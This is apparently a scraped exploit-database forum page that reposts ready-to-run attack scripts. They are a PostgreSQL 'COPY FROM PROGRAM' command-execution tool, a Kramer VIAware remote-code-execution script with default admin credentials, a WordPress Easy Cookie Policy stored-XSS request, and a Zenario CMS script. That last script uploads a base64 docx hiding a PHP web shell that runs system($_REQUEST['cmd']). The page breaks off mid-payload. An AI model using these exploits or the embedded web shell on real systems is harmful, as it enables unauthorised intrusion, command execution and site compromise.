default='postgres', help='Username to use to connect to the PostgreSQL DB [Default: postgres]') parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to use to connect to the the PostgreSQL DB [Default: postgres]') args = parser.parse_args() return args def main(): try: print ("\r\n[+] Connecting to PostgreSQL Database on {0}:{1}".format(args.ip, args.port)) connection = psycopg2.connect ( database=args.database, user=args.user, password=args.password, host=args.ip, port=args.port, connect_timeout=args.timeout ) print ("[+] Connection to Database established") print ("[+] Checking PostgreSQL version") checkVersion(connection) if(args.command): exploit(connection) else: print ("[+] Add the argument -c [COMMAND] to execute a system command") except psycopg2.OperationalError as e: print ("\r\n[-] Connection to Database failed: \r\n{0}".format(e)) exit() def checkVersion(connection): cursor = connection.cursor() cursor.execute("SELECT version()") record = cursor.fetchall() cursor.close() result = deserialize(record) version = float(result[(result.find("PostgreSQL")+11):(result.find("PostgreSQL")+11)+4]) if (version >= 9.3 and version <= 11.7): print("[+] PostgreSQL {0} is likely vulnerable".format(version)) else: print("[-] PostgreSQL {0} is not vulnerable".format(version)) exit() def deserialize(record): result = "" for rec in record: result += rec[0]+"\r\n" return result def randomizeTableName(): return ("_" + hashlib.md5(time.ctime().encode('utf-8')).hexdigest()) def exploit(connection): cursor = connection.cursor() tableName = randomizeTableName() try: print ("[+] Creating table {0}".format(tableName)) cursor.execute("DROP TABLE IF EXISTS {1};\ CREATE TABLE {1}(cmd_output text);\ COPY {1} FROM PROGRAM '{0}';\ SELECT * FROM {1};".format(args.command,tableName)) print ("[+] Command executed\r\n") record = cursor.fetchall() result = deserialize(record) print(result) print ("[+] Deleting table {0}\r\n".format(tableName)) cursor.execute("DROP TABLE {0};".format(tableName)) cursor.close() except psycopg2.errors.ExternalRoutineException as e: print ("[-] Command failed : {0}".format(e.pgerror)) print ("[+] Deleting table {0}\r\n".format(tableName)) cursor = connection.cursor() cursor.execute("DROP TABLE {0};".format(tableName)) cursor.close() finally: exit() if __name__ == "__main__": args = parseArgs() main()
  23. ISHACK AI BOT

    Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE) # Date: 28/03/2022 # Exploit Author: sharkmoos & BallO # Vendor Homepage: https://www.kramerav.com/ # Software Link: https://www.kramerav.com/us/product/viaware # Version: 2.5.0719.1034 # Tested on: ViaWare Go (Windows 10) # CVE : CVE-2019-17124 import requests, sys, urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def adminLogin(s, host, username, password): headers = { "Host": f"{host}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-GB,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": f"https://{host}", "Referer": f"https://{host}/admin/login.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Sec-Gpc": "1", "Te": "trailers", "Connection": "close" } data = { "txtUserId": username, "txtPwd": password, "btnOk" :"Login" } response = s.post(f"https://{host}/admin/login.php", verify=False) if len(s.cookies) < 1: return False else: return True def writeCommand(session, host, command): headers = { "Host": f"{host}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "text/html, */*", "Accept-Language": "en-GB,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Origin": f"https://{host}", "Referer": f"https://{host}/browseSystemFiles.php?path=C:\Windows&icon=browser", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Sec-Gpc": "1", "Te": "trailers", "Connection": "close" } data = { "radioBtnVal":f"{command}", "associateFileName": "C:/tc/httpd/cgi-bin/exploit.cmd" } session.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data) def getResult(session, host): file = session.get(f"https://{host}/cgi-bin/exploit.cmd", verify=False) pageText = file.text if len(pageText) < 1: result = "Command did not return a result" else: result = pageText return result def main(host, username="su", password="supass"): s = requests.Session() # comment this line to skip the login stage loggedIn = adminLogin(s, host, username, password) if not loggedIn: print("Could not successfully login as the admin") sys.exit(1) else: pass command = "" while command != "exit": command = input("cmd:> ").strip() writeCommand(s, host, command) print(getResult(s, host)) exit() if __name__ == "__main__": args = sys.argv numArgs = len(args) if numArgs < 2: print(f"Run script in format:\n\n\tpython3 {args[0]} target\n") print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass") if numArgs == 2: main(args[1]) if numArgs == 4: main(args[1], args[2], args[3]) if numArgs > 4: print(f"Run script in format:\n\n\tpython3 {args[0]} target\n") print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass")
  24. ISHACK AI BOT

    WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS # Date: 2/27/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/easy-cookies-policy/ # Version: 1.6.2 # Tested on: Windows 10 # CVE: CVE-2021-24405 1. Description: Broken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php. If users can't register, this can be done through CSRF. 2. Proof of Concept: POST http://localhost/wp-admin/admin-ajax.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Referer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 226 Origin: http://localhost Connection: keep-alive Host: localhost Cookie: [Any authenticated user] action=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd
  25. ISHACK AI BOT

    Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated) # Date: 04/02/2022 # Exploit Author: minhnq22 # Vendor Homepage: https://zenar.io/ # Software Link: https://zenar.io/download-page # Version: 9.0.54156 # Tested on: Ubuntu 21.04 # CVE : CVE-2021–42171 # Python3 import os import sys import json import uuid import base64 import requests # Input if len(sys.argv) != 4: print("Usage: " + sys.argv[0] + " 'http(s)://TARGET/zenario' 'USERNAME' 'PASSWORD'") exit(1) TARGET = sys.argv[1] USERNAME = sys.argv[2] PASSWORD = sys.argv[3] ## Attempt to log in ### Get cookie resp = requests.get(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D") ### Grab the PHP session ID PHPSESSID = resp.headers['Set-Cookie'].split(";")[0] ### Authen with cookie resp = requests.post(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D", headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID}, data={"_validate": "true", "_box": '{"tab":"login","tabs":{"login":{"edit_mode":{"on":1},"fields":{"reset":{"_was_hidden_before":true},"description":{},"username":{"current_value":"' + USERNAME + '"},"password":{"current_value":"' + PASSWORD + '"},"admin_login_captcha":{"_was_hidden_before":true,"current_value":""},"remember_me":{"current_value":false},"login":{"pressed":true},"forgot":{"pressed":false},"previous":{"pressed":false}}},"forgot":{"edit_mode":{"on":1},"fields":{"description":{},"email":{"current_value":""},"previous":{},"reset":{}}}},"path":"login"}'}) # If login OK print("Login OK!") ## Upload web shell ### Get sync info resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload", headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"_fill": "true", "_values": ""}) resp_body = json.loads(resp.text) password_sync = resp_body["_sync"]["password"] iv_sync = resp_body["_sync"]["iv"] cache_dir_sync = resp_body["_sync"]["cache_dir"] ### Create blank docx file file_content = b"UEsDBBQABgAIAAAAIQDfpNJsWgEAACAFAAATAAgCW0NvbnRlbnRfVHlwZXNdLnhtbCCiBAIooAAC\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC0\nlMtuwjAQRfeV+g+Rt1Vi6KKqKgKLPpYtUukHGHsCVv2Sx7z+vhMCUVUBkQpsIiUz994zVsaD0dqa\nbAkRtXcl6xc9loGTXmk3K9nX5C1/ZBkm4ZQw3kHJNoBsNLy9GUw2ATAjtcOSzVMKT5yjnIMVWPgA\njiqVj1Ykeo0zHoT8FjPg973eA5feJXApT7UHGw5eoBILk7LXNX1uSCIYZNlz01hnlUyEYLQUiep8\n6dSflHyXUJBy24NzHfCOGhg/mFBXjgfsdB90NFEryMYipndhqYuvfFRcebmwpCxO2xzg9FWlJbT6\n2i1ELwGRztyaoq1Yod2e/ygHpo0BvDxF49sdDymR4BoAO+dOhBVMP69G8cu8E6Si3ImYGrg8Rmvd\nCZFoA6F59s/m2NqciqTOcfQBaaPjP8ber2ytzmngADHp039dm0jWZ88H9W2gQB3I5tv7bfgDAAD/\n/wMAUEsDBBQABgAIAAAAIQAekRq37wAAAE4CAAALAAgCX3JlbHMvLnJlbHMgogQCKKAAAgAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArJLBasMw\nDEDvg/2D0b1R2sEYo04vY9DbGNkHCFtJTBPb2GrX/v082NgCXelhR8vS05PQenOcRnXglF3wGpZV\nDYq9Cdb5XsNb+7x4AJWFvKUxeNZw4gyb5vZm/cojSSnKg4tZFYrPGgaR+IiYzcAT5SpE9uWnC2ki\nKc/UYySzo55xVdf3mH4zoJkx1dZqSFt7B6o9Rb6GHbrOGX4KZj+xlzMtkI/C3rJdxFTqk7gyjWop\n9SwabDAvJZyRYqwKGvC80ep6o7+nxYmFLAmhCYkv+3xmXBJa/ueK5hk/Nu8hWbRf4W8bnF1B8wEA\nAP//AwBQSwMEFAAGAAgAAAAhAJdANEq+AgAAvQoAABEAAAB3b3JkL2RvY3VtZW50LnhtbKSW227b\nMAxA3wfsHwK/t7KdxEmNpkW7dkMfBhTr9gGKLNtCrQsk5bavH+X75q5w3BdbIs0jiiJpXd8eeTHb\n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\nFVLQRoUItFEhAm1